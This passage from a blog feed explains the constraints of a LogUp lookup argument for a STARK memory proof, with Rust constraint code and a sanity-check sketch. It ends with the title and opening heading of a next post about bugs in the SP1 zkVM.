\ \newline&lt;br &#x2F;&gt;
&amp;amp;+ m_{i+1} \cdot (z - (a_{i+1} + \alpha v_{i+1}))&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
&amp;amp;- (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1}))&lt;br &#x2F;&gt;
\end{align}$$&lt;&#x2F;p&gt;
&lt;p&gt;Additionally, we will move the left-hand side of the equality to the right, subtracting it so that it can be interpreted as a polynomial in the variables $s$, $a$, $a’$, $v$, $v’$ and $m$ that is equal to zero:&lt;&#x2F;p&gt;
&lt;p&gt;$$\begin{align} 0 &amp;amp;=s_i \cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1}))&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
&amp;amp;+ m_{i+1} \cdot (z - (a_{i+1} + \alpha v_{i+1}))&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
&amp;amp;- (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1}))&lt;br &#x2F;&gt;
\ \newline&lt;br &#x2F;&gt;
&amp;amp;- s_{i+1} \cdot (z - (a^\prime_{i+1} + \alpha v^\prime_{i+1})) \cdot (z - (a_{i+1} + \alpha v_{i+1}))&lt;br &#x2F;&gt;
\end{align}$$&lt;&#x2F;p&gt;
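&lt;p&gt;As a quick sanity check on the multiplied-out form, the sketch below (again plain modular arithmetic with placeholder challenges, not the lambdaworks API) computes an honest $s_{i+1}$ from the rational recurrence and verifies that the division-free expression evaluates to zero, while a tampered accumulator makes it nonzero.&lt;&#x2F;p&gt;

```rust
// Sanity check for the division-free permutation constraint, assuming
// plain arithmetic in F_p with p = 2^31 - 1 (not the lambdaworks types).

const P: u128 = 2_147_483_647;

fn add(a: u128, b: u128) -> u128 { (a + b) % P }
fn sub(a: u128, b: u128) -> u128 { (a + P - b % P) % P }
fn mul(a: u128, b: u128) -> u128 { (a * b) % P }
fn inv(a: u128) -> u128 {
    let (mut base, mut exp, mut acc) = (a % P, P - 2, 1u128);
    while exp > 0 {
        if exp & 1 == 1 { acc = mul(acc, base); }
        base = mul(base, base);
        exp >>= 1;
    }
    acc
}

// unsorted = z - (a + alpha * v), sorted = z - (a' + alpha * v').
// A row is the hypothetical tuple (a, v, a', v', m).
fn terms(row: &[u128; 5], z: u128, alpha: u128) -> (u128, u128) {
    let [a, v, a_s, v_s, _m] = *row;
    (sub(z, add(a, mul(alpha, v))), sub(z, add(a_s, mul(alpha, v_s))))
}

// Honest recurrence: s1 = s0 + m / sorted - 1 / unsorted.
fn honest_next(s0: u128, row: &[u128; 5], z: u128, alpha: u128) -> u128 {
    let (unsorted, sorted) = terms(row, z, alpha);
    sub(add(s0, mul(row[4], inv(sorted))), inv(unsorted))
}

// Division-free constraint from the equation above:
// res = s0*unsorted*sorted + m*unsorted - sorted - s1*unsorted*sorted.
fn constraint_eval(s0: u128, s1: u128, row: &[u128; 5], z: u128, alpha: u128) -> u128 {
    let (unsorted, sorted) = terms(row, z, alpha);
    sub(
        sub(add(mul(mul(s0, unsorted), sorted), mul(row[4], unsorted)), sorted),
        mul(mul(s1, unsorted), sorted),
    )
}

fn main() {
    let (z, alpha) = (987_654_321u128, 123_456_789u128);
    let row = [1u128, 10, 2, 20, 2]; // (a, v, a', v', m)
    let s0 = 42u128;

    let s1 = honest_next(s0, &row, z, alpha);
    // The constraint vanishes on the honest transition...
    assert_eq!(constraint_eval(s0, s1, &row, z, alpha), 0);
    // ...and is nonzero for a tampered accumulator.
    assert_ne!(constraint_eval(s0, add(s1, 1), &row, z, alpha), 0);
}
```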
&lt;p&gt;This equation can be found inside the function &lt;code&gt;evaluate()&lt;&#x2F;code&gt; in the implementation of &lt;code&gt;PermutationConstraint&lt;&#x2F;code&gt;. It is worth mentioning that both the prover and verifier must evaluate the polynomial constraint in the same way. However, we are forced to separate this evaluation into two cases because the &lt;code&gt;frames&lt;&#x2F;code&gt; used by each one are of different types.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn evaluate(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    evaluation_context: &amp;amp;TransitionEvaluationContext&amp;lt;F, E&amp;gt;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_evaluations: &amp;amp;mut [FieldElement&amp;lt;E&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; In both evaluation contexts, Prover and Verifier will evaluate the transition polynomial in the same way.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; The only difference is that the Prover&amp;#39;s Frame has base field and field extension elements,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; while the Verifier&amp;#39;s Frame has only field extension elements.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    match evaluation_context {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        TransitionEvaluationContext::Prover {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            frame,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            periodic_values: _periodic_values,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            rap_challenges,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } =&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let first_step = frame.get_evaluation_step(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let second_step = frame.get_evaluation_step(1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Auxiliary frame elements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let s0 = first_step.get_aux_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let s1 = second_step.get_aux_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Challenges&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let z = &amp;amp;rap_challenges[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let alpha = &amp;amp;rap_challenges[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Main frame elements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a1 = second_step.get_main_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let v1 = second_step.get_main_evaluation_element(0, 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let m = second_step.get_main_evaluation_element(0, 4);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let unsorted_term = -(a1 + v1 * alpha) + z;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let sorted_term = -(a_sorted_1 + v_sorted_1 * alpha) + z;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; We are using the following LogUp equation:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; s1 = s0 + m &#x2F; sorted_term - 1&#x2F;unsorted_term.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Since constraints must be expressed without division, we multiply each term by sorted_term * unsorted_term:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let res = s0 * &amp;amp;unsorted_term * &amp;amp;sorted_term + m * &amp;amp;unsorted_term&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                - &amp;amp;sorted_term&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                - s1 * unsorted_term * sorted_term;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; The eval always exists, except if the constraint idx was incorrectly defined.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            if let Some(eval) = transition_evaluations.get_mut(self.constraint_idx()) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                *eval = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        TransitionEvaluationContext::Verifier {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            frame,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            periodic_values: _periodic_values,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            rap_challenges,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } =&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let first_step = frame.get_evaluation_step(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let second_step = frame.get_evaluation_step(1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Auxiliary frame elements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let s0 = first_step.get_aux_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let s1 = second_step.get_aux_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Challenges&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let z = &amp;amp;rap_challenges[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let alpha = &amp;amp;rap_challenges[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Main frame elements&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a1 = second_step.get_main_evaluation_element(0, 0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let v1 = second_step.get_main_evaluation_element(0, 1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let a_sorted_1 = second_step.get_main_evaluation_element(0, 2);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let v_sorted_1 = second_step.get_main_evaluation_element(0, 3);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let m = second_step.get_main_evaluation_element(0, 4);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let unsorted_term = z - (a1 + alpha * v1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let sorted_term = z - (a_sorted_1 + alpha * v_sorted_1);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; We are using the following LogUp equation:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; s1 = s0 + m &#x2F; sorted_term - 1&#x2F;unsorted_term.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; Since constraints must be expressed without division, we multiply each term by sorted_term * unsorted_term:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let res = s0 * &amp;amp;unsorted_term * &amp;amp;sorted_term + m * &amp;amp;unsorted_term&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                - &amp;amp;sorted_term&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                - s1 * unsorted_term * sorted_term;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            &#x2F;&#x2F; The eval always exists, except if the constraint idx was incorrectly defined.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            if let Some(eval) = transition_evaluations.get_mut(self.constraint_idx()) {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                *eval = res;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Another noteworthy change is that the polynomial associated with this constraint is now of degree 3. This is easy to see in the zero-equality equation above: some of its terms are products of three factors, each linear in a trace variable, so the total degree is 3.&lt;&#x2F;p&gt;
&lt;p&gt;It’s worth highlighting that, up until now, both in the previous post and in the other two transition constraints, we had only worked with polynomials of degree 2. This change is reflected in the code in two places. First, we must specify the degree of a transition constraint when defining it:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl&amp;lt;F, E&amp;gt; TransitionConstraint&amp;lt;F, E&amp;gt; for PermutationConstraint&amp;lt;F, E&amp;gt;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;where&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    F: IsSubFieldOf&amp;lt;E&amp;gt; + IsFFTField + Send + Sync,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    E: IsField + Send + Sync,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;{&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fn degree(&amp;amp;self) -&amp;gt; usize {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        3&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Second, when implementing the AIR, we must specify the degree bound of the composition polynomial. In previous implementations, this bound was set equal to the length of the trace; in this case it must be twice as large. This ensures that when the prover defines the composition polynomial, she can split it into two parts of half the degree. If we didn’t do this, the prover and verifier would work with the entire composition polynomial without splitting it, increasing the number of FRI rounds and losing that optimization:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn composition_poly_degree_bound(&amp;amp;self) -&amp;gt; usize {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    self.trace_length() * 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;boundary-constraints&quot;&gt;Boundary Constraints&lt;&#x2F;h3&gt;
&lt;p&gt;Finally, let’s discuss how to define the boundary constraints. All boundary constraints related to the main trace will remain the same: we need to ensure that $a_0$, $a^\prime_0$, $v_0$, and $v^\prime_0$ match the values specified in the public inputs. Additionally, we need to include one more constraint to verify that $m_0$ is correctly defined according to the value described in the public input.&lt;&#x2F;p&gt;
&lt;p&gt;Now, the constraints on the auxiliary trace will change slightly compared to those used in the Grand Product. Following the same logic as before, we must ensure, on one hand, that the first element of the auxiliary column $s$ is correctly constructed, that is, that $s_0$ satisfies the equation described earlier in the &lt;em&gt;Auxiliary Trace&lt;&#x2F;em&gt; section. On the other hand, we need to check that the last element $s_{n-1}$ equals zero, ensuring that all terms cancel out and verifying that the trace corresponds to a permutation.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn boundary_constraints(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;self,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    rap_challenges: &amp;amp;[FieldElement&amp;lt;Self::FieldExtension&amp;gt;],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;) -&amp;gt; BoundaryConstraints&amp;lt;Self::FieldExtension&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a0 = &amp;amp;self.pub_inputs.a0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v0 = &amp;amp;self.pub_inputs.v0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let a_sorted_0 = &amp;amp;self.pub_inputs.a_sorted_0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let v_sorted_0 = &amp;amp;self.pub_inputs.v_sorted_0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let m0 = &amp;amp;self.pub_inputs.m0;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let z = &amp;amp;rap_challenges[0];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let alpha = &amp;amp;rap_challenges[1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Main boundary constraints&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c1 = BoundaryConstraint::new_main(0, 0, a0.clone().to_extension());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c2 = BoundaryConstraint::new_main(1, 0, v0.clone().to_extension());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c3 = BoundaryConstraint::new_main(2, 0, a_sorted_0.clone().to_extension());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c4 = BoundaryConstraint::new_main(3, 0, v_sorted_0.clone().to_extension());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c5 = BoundaryConstraint::new_main(4, 0, m0.clone().to_extension());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Auxiliary boundary constraints&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let unsorted_term = (-(a0 + v0 * alpha) + z).inv().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let sorted_term = (-(a_sorted_0 + v_sorted_0 * alpha) + z).inv().unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let p0_value = m0 * sorted_term - unsorted_term;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c_aux1 = BoundaryConstraint::new_aux(0, 0, p0_value);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let c_aux2 = BoundaryConstraint::new_aux(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        0,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        self.trace_length - 1,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        FieldElement::&amp;lt;Self::FieldExtension&amp;gt;::zero(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    );&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    BoundaryConstraints::from_constraints(vec![c1, c2, c3, c4, c5, c_aux1, c_aux2])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we explored the lookup argument LogUp, using the example of a continuous read-only memory explained in a previous post. By changing the construction of some columns of the trace table, the permutation transition constraint, and a few other small details, we adapted the implementation we already had for that same example to this new method.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>The future of ZK is in RISC-V zkVMs, but the industry must be careful: how Succinct&#x27;s SP1&#x27;s departure from standards causes bugs</title>
          <pubDate>Sat, 21 Dec 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/the-future-of-zk-is-in-risc-v-zkvms-but-the-industry-must-be-careful-how-succincts-sp1s-departure-from-standards-causes-bugs/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/the-future-of-zk-is-in-risc-v-zkvms-but-the-industry-must-be-careful-how-succincts-sp1s-departure-from-standards-causes-bugs/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/the-future-of-zk-is-in-risc-v-zkvms-but-the-industry-must-be-careful-how-succincts-sp1s-departure-from-standards-causes-bugs/">&lt;h2 id=&quot;why-you-should-avoid-having-complex-codebases-and-departing-from-standards-when-developing-zero-knowledge-virtual-machines&quot;&gt;Why you should avoid having complex codebases and departing from standards when developing zero-knowledge virtual machines&lt;&#x2F;h2&gt;
